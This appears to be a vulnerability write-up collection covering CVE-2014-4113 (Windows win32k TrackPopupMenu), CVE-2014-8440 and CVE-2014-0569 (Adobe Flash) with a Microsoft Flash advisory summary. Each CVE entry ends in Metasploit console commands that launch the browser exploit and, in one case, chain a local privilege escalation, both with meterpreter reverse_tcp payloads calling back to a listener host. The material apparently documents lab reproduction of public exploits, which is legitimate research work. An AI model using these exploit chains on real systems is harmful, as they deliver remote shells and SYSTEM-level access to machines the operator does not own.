CVE-2014-4113 Windows TrackPopupMenu Win32k NULL Pointer Dereference

Timeline :

Vulnerability discovered being exploited in the wild
Patched by the vendor via MS14-058 on 2014-10-14
Metasploit PoC provided on 2014-10-24

PoC provided by :

Unknown
juan vazquez
Spencer McIntyre
OJ Reeves

Reference(s) :

CVE-2014-4113
BID-70364
MS14-058

Affected version(s) :

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 and Windows 8.1
Windows Server 2012 and Windows Server 2012 R2
Windows RT and Windows RT 8.1

Tested on :

on Windows 7 SP1, in combination with the CVE-2014-8440 (Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory) vulnerability

Description :

This module exploits a NULL pointer dereference in win32k.sys; the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused in xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 (32-bit), and also on Windows 7 SP1 and Windows 2008 R2 SP1 (64-bit).

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

use exploit/windows/local/ms14_058_track_popup_menu
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LPORT 4445
set SESSION 1
run

getuid
sysinfo

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign's iDefense VCP
Vulnerability reported to the vendor by Verisign's iDefense VCP on 2014-09-03
Patched by the vendor via APSB14-24 on 2014-11-11
Vulnerability reported as integrated into exploit kits on 2014-11-20
Metasploit PoC provided on 2015-04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When a suitable memory layout is used, this vulnerability leads to a ByteArray object corruption, which can be abused to read and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE 11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

MSA-2755801 Microsoft Emergency Patch For Flash Player 0day

On December 29th 2015, Microsoft released an emergency patch, together with the update of one security advisory concerning Adobe Flash Player.

Microsoft Security Advisory 2755801

MSA-2755801, released during September 2012, has been updated. The security advisory concerns updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3132372 has been released for supported editions of:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities, including the Adobe Flash Player 0day (CVE-2015-8651), described in Adobe Security Bulletin APSB16-01.

Application of KB3132372 could lead to limited application crashes on Windows 10.

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2014-09-10
Patched by the vendor via APSB14-22 on 2014-10-14
Vulnerability reported as integrated into exploit kits on 2014-10-21
Metasploit PoC provided on 2015-04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow happens if a ByteArray of length 0 is set up as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11, with Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo